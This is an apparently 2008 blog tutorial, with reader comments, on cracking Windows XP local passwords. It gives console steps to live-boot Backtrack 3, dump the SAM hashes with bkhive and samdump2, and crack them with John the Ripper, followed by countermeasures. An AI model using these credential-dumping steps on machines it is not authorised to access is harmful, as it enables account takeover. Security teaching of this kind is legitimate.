Cracking WindowsXP local user password with Backtrack 3

Cracking job become easy when Backtrack Linux distro come in place, and it get easier when you want crack password saved in WinXP.

Windows XP stored it username and password information in file named SAM at %SystemDrive%:\Windows\system32\config\. The SAM file is encrypted using LM hashes, which is vulnerable to rainbow table attack and bruteforce attack.

Insert the Backtrack3 CD/USB, make it a live boot up.

When you get into Backtrack 3 Desktop

On the console, type

df *to view the harddisk partition distribution on, you may find your Windows system stored at partition /mnt/hda1 (usually, as used for example here)
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *bkhive manual
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing dumped password harsh file
cat ~/Desktop/password.txt

You will see the usersname and the hash values of the SAM file.

There are multiple way to crack the hash (johntheripper, rainbow table, LCP). Over here, we use john the ripper as example.

john ~/Desktop/password.txt –users=Administrator (Administrator is the example user name)

The user Owner has the password “abc123” and the Administrator has no password.

Countermeasure for the attack:

  • Set boot-up password on BIOS to prevent unauthorized live boot up using CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. Strong password means combination of alphanumeric(01245…vwxyz) and symbols (!@#$%^&*()_+), at least 8 characters in length, will take much longer time (sometimes may be impossible to crack, like password “%a^&b*&e^$5*45*&^%<%” for medium-size rainbow table) to do its job.

Reference and credits to:

  1. Password Cracking Lab – Gary Neubauer II – vSpaceLab.com
  2. Offline Windows password and Registry Editor
  3. Windows XP Menggunakan Linux Backtrack 3 beta
  4. How To: Crack Windows Passwords From SAM and SYSTEM Files, With Backtrack Installed
  5. DIY: Ripping off Windows XP using Backtrack Linux in 10 mins

12 Responses to “Cracking WindowsXP local user password with Backtrack 3”

  1. 1 Bryan
    November 5, 2008 at 7:31 am

    I couldn’t help but notice the example picture and the username said …..that wouldn’t happen to be one of the university of iowa’s computers now would it? hahaha

  2. 2 albertsiow
    November 5, 2008 at 10:03 am

    If the computer is a member of Active Directory, then this matter won’t work!
    For prevention, please refer to the suggestion above…
    Say an example, if you don’t implement a harddisk encryption solution, the BIOS is anyone-configurable to boot Live OS, and all pc are standalone workstation, it will works!

  3. 3 Tom
    December 7, 2008 at 7:48 pm

    This is a good article and the countermeasures are good advice, but the article fails to mention one thing. By using a 15 character or longer password, the hashes are not stored as vulnerable hashes. If you use a fifteen character or longer password, it doesn’t matter what charset you use ([a-z] should be sufficient), it will take forever to crack.

    • 4 albertsiow
      December 9, 2008 at 2:40 am

      Thanks for your comment Tom.
      I think with the help of Rainbow Table, the NTLM hash of 15 character or more password is still vulnerable, depending on the password coverage range of the table. Please prove me wrong. Thanks!

  4. 5 Oktain
    April 7, 2009 at 1:18 am

    Old topic I know.

    But I have to correct Tom. Hashes are cracked just by brute force. A 15+ char password means nothing with a weak char set. Just FYI

    • 6 Reki
      June 21, 2010 at 4:07 am

      I need to correct Oktain. Using a rainbow table is nothing like brute forcing. Rainbow tables list all of the combinations and their hashes, making cracking passwords a snap.

  5. 7 Oktain
    April 7, 2009 at 1:19 am

    Typo in my previous comment “are” should be “aren’t”

  6. May 31, 2010 at 8:14 am

    I am Elijah i am from south africa i am doing my first year in IT i will like everything about programing especially about cracking and hacking; and i find this web site very usefull to me and also relavent.Thanks

  7. 9 aqil
    August 10, 2010 at 9:52 am

    help me i want learn IT

  8. April 20, 2011 at 2:36 pm

    Hi AlbertSiow,

    I am new to backtrack and currently using BT4. Just for an educational purpose 😉
    How do you get (hack) into another pc that run Win XP in Japan (for example) when u only have their ip address and you are in China? What are the tools needed & how ?

    N33D 4 C|u3.

    • 12 albertsiow
      April 20, 2011 at 5:39 pm

      You can’t! Physical access is needed. We can still gain the credential through IP address but more jobs needed, most probably loophole on its outdated service (privilege escalation and so on…)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

October 2008
« Sep   Dec »

%d bloggers like this: